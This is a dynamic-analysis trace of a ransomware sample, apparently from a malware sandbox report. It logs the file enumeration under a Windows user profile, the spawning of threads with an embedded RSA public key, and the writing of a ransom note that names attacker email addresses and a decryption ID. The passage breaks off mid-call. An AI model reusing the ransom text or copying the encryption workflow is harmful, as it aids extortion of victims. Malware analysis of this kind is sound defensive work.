StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0100.208] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0100.208] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0100.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.208] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0100.208] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.208] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0100.208] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b0 [0100.208] Sleep (dwMilliseconds=0x96) [0100.361] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.361] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0100.361] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0100.361] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.361] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0100.362] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0100.362] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0100.362] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0100.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.362] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0100.362] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.362] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0100.362] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0100.362] Sleep (dwMilliseconds=0x96) [0100.516] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.516] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0100.516] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0100.516] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.516] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0100.516] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0100.516] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0100.516] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0100.516] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.516] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.516] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0100.516] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.516] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0100.516] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b8 [0100.517] Sleep (dwMilliseconds=0x96) [0100.672] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.672] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0100.672] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0100.672] StrStrW (lpFirst="ntuser.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.672] StrStrW (lpFirst="ntuser.ini", lpSrch="ntldr") returned 0x0 [0100.672] StrStrW (lpFirst="ntuser.ini", lpSrch="NTLDR") returned 0x0 [0100.672] StrStrW (lpFirst="ntuser.ini", lpSrch="NTDETECT.COM") returned 0x0 [0100.672] StrStrW (lpFirst="ntuser.ini", lpSrch="ntdetect.com") returned 0x0 [0100.672] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.672] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.672] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0100.672] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.672] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0100.672] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0100.673] Sleep (dwMilliseconds=0x96) [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.833] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0100.833] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0100.833] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0100.833] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0100.833] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0100.833] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0100.833] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0100.833] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0100.833] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.834] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.834] SetErrorMode (uMode=0x1) returned 0x1 [0100.834] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT") returned 51 [0100.834] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0100.834] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0100.834] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x2c0) returned 0x0 [0100.834] RegQueryValueExW (in: hKey=0x2c0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cade18, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3cade18*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0100.834] RegCloseKey (hKey=0x2c0) returned 0x0 [0100.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0100.834] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0100.834] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0100.835] CloseHandle (hObject=0x2c0) returned 1 [0100.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0100.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0100.835] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0100.835] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0100.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.835] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.835] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.835] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.835] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0100.835] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0100.835] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0100.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0100.835] SetErrorMode (uMode=0x1) returned 0x1 [0100.835] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0100.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0100.835] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0100.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0100.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0100.836] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0100.836] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0100.836] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0100.836] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0100.836] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0100.836] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="Desktop") returned 0x0 [0100.836] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="DESKTOP") returned 0x0 [0100.836] SetErrorMode (uMode=0x1) returned 0x1 [0100.836] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT") returned 59 [0100.836] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0100.836] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0100.836] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x2d8) returned 0x0 [0100.836] RegQueryValueExW (in: hKey=0x2d8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cae048, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cae048*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0100.836] RegCloseKey (hKey=0x2d8) returned 0x0 [0100.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0100.837] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0100.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0100.891] CloseHandle (hObject=0x2d8) returned 1 [0100.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0100.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0100.892] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: 